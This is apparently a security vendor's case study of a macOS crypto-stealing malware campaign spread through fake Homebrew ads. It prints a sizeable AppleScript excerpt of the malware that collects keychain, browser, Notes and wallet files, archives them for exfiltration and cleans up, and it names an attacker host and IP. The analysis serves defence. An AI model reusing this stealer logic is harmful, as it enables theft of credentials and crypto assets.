Crypto-Targeting Malware: A Case Study from Google Ads to Data Theft

Crypto-targeting malware is not a new threat, but its methods continue to evolve. In this case study, we analyze a recent attack that leverages Google Ads to distribute malicious scripts, ultimately stealing sensitive data from macOS users.

The Attack Chain: From Google Ads to Data Theft

This attack follows a well-defined chain, starting with fake Google Ads and ending with the execution of malicious scripts. Here’s how it works:

1. Fake Google Ads

• Attackers create ads targeting keywords like “Homebrew.”
• The ads look legitimate, often appearing at the top of search results.

2. Malicious Script Execution

• Users click the ad and are redirected to a fake website mimicking the official Homebrew page.
• The site offers a malicious installation script, hosted on norikosumiya.com.

3. Data Theft

on getpwd(username, writemind)
    ...
end getpwd

set username to (system attribute 'USER')
set profile to '/Users/' & username
set randomNumber to do shell script 'echo $((RANDOM % 9000 + 1000))'
set writemind to '/tmp/' & randomNumber & '/'
try
    set result to (do shell script 'system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType')
    writeText(result, writemind & 'info')
end try
set library to profile & '/Library/Application Support/'
set password_entered to getpwd(username, writemind)
delay 0.01
set chromiumMap to {{'Chrome', library & 'Google/Chrome/'}, {'Brave', library & 'BraveSoftware/Brave-Browser/'}, {'Edge', library & 'Microsoft Edge/'}, {'Vivaldi', library & 'Vivaldi/'}, {'Opera', library & 'com.operasoftware.Opera/'}, {'OperaGX', library & 'com.operasoftware.OperaGX/'}, {'Chrome Beta', library & 'Google/Chrome Beta/'}, {'Chrome Canary', library & 'Google/Chrome Canary'}, {'Chromium', library & 'Chromium/'}, {'Chrome Dev', library & 'Google/Chrome Dev/'}, {'Arc', library & 'Arc/'}, {'Coccoc', library & 'Coccoc/'}}
set walletMap to {{'deskwallets/Electrum', profile & '/.electrum/wallets/'}, {'deskwallets/Coinomi', library & 'Coinomi/wallets/'}, {'deskwallets/Exodus', library & 'Exodus/'}, {'deskwallets/Atomic', library & 'atomic/Local Storage/leveldb/'}, {'deskwallets/Wasabi', profile & '/.walletwasabi/client/Wallets/'}, {'deskwallets/Ledger_Live', library & 'Ledger Live/'}, {'deskwallets/Monero', profile & '/Monero/wallets/'}, {'deskwallets/Bitcoin_Core', library & 'Bitcoin/wallets/'}, {'deskwallets/Litecoin_Core', library & 'Litecoin/wallets/'}, {'deskwallets/Dash_Core', library & 'DashCore/wallets/'}, {'deskwallets/Electrum_LTC', profile & '/.electrum-ltc/wallets/'}, {'deskwallets/Electron_Cash', profile & '/.electron-cash/wallets/'}, {'deskwallets/Guarda', library & 'Guarda/'}, {'deskwallets/Dogecoin_Core', library & 'Dogecoin/wallets/'}, {'deskwallets/Trezor_Suite', library & '@trezor/suite-desktop/'}}
readwrite(library & 'Binance/app-store.json', writemind & 'deskwallets/Binance/app-store.json')
readwrite(library & '@tonkeeper/desktop/config.json', 'deskwallets/TonKeeper/config.json')
readwrite(profile & '/Library/Keychains/login.keychain-db', writemind & 'keychain')
if release then
    readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite', writemind & 'FileGrabber/NoteStore.sqlite')
    readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal', writemind & 'FileGrabber/NoteStore.sqlite-wal')
    readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm', writemind & 'FileGrabber/NoteStore.sqlite-shm')
    readwrite2(profile & '/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/Cookies.binarycookies')
    readwrite(profile & '/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/saf1')
end if
filegrabber(writemind)
writeText(username, writemind & 'username')
set ff_paths to {library & 'Firefox/Profiles/', library & 'Waterfox/Profiles/', library & 'Pale Moon/Profiles/'}
repeat with firefox in ff_paths
    try
        parseFF(firefox, writemind)
    end try
end repeat
chromium(writemind, chromiumMap)
deskwallets(writemind, walletMap)
telegram(writemind, library)
do shell script 'ditto -c -k --sequesterRsrc ' & writemind & ' /tmp/out.zip'
send_data(0)
do shell script 'rm -r ' & writemind
do shell script 'rm /tmp/out.zip'

• The malware uses scripts to:
  • Steal browser data: Cookies, passwords, and extensions (e.g., MetaMask, Coinbase Wallet, Phantom).
  • Harvest crypto wallet files: From Electrum, Exodus, Atomic Wallet, Ledger Live, and more.
  • Extract private keys and other sensitive data to drain crypto assets.
  • Access keychain data and Telegram files.

4. Password Extraction

• The malware uses a function called getpwd to induce users to enter their system password through fake prompts. This allows it to escalate privileges and access protected data.

5. Data Exfiltration

• All stolen data is compressed into a ZIP file and sent to a remote server (81.19.135.54/joinsystem) via curl with custom headers (user, BuildID).

6. Cleanup

• The malware deletes temporary files and directories to cover its tracks.

Key Insights from the Analysis

1. Google Ads as a Distribution Channel:
   • Attackers exploit Google Ads to distribute malicious scripts, leveraging the trust users place in search engine results.
2. Social Engineering:
   • The malware uses fake password prompts (getpwd) to trick users into providing their system credentials.
3. Targeted Data Theft:
   • It specifically targets crypto users by stealing browser data, wallet files, and private keys.
4. Evasion Techniques:
   • The malware avoids detection by using temporary directories and cleaning up after itself.

How to Protect Yourself

To protect yourself from these sophisticated attacks:

1. Avoid Clicking on Ads:
   • Always download software from official sources (e.g., Homebrew’s official site).
2. Verify File Integrity:
   • Check file hashes or signatures before running scripts.
3. Use Antivirus Software:
   • Regularly scan your system for malware.
4. Be Wary of Password Prompts:
   • Never enter your system password unless you are certain of the prompt’s legitimacy.
5. Store Private Keys Offline:
   • Use hardware wallets or cold storage to protect your crypto assets.

Evolution of Crypto-Targeting Malware

While crypto-targeting malware is not new, this case highlights how attackers are refining their methods. By combining social engineering (fake password prompts) with automated data extraction, they can bypass traditional security measures and maximize their impact.

Conclusion

Crypto users must remain vigilant as attackers continue to develop more sophisticated methods to steal digital assets. By following best practices and staying informed about emerging threats, you can better protect yourself from these attacks.

Stay safe, and share this information to help others in the crypto community.

About ScamSniffer

ScamSniffer is a security platform focused on Web3 anti-scam, providing real-time protection by combining off-chain and on-chain monitoring data. Our browser security extension helps users identify phishing websites and suspicious transactions, offering comprehensive protection for Web3 users.

Our security solutions have been adopted by wallets including Binance, Bybit, OneKey, Phantom, TokenPocket, and others, protecting millions of Web3 users monthly from phishing and fraud threats.

We are committed to building a safer Web3 ecosystem for the next billion users.

Stay informed, stay secure.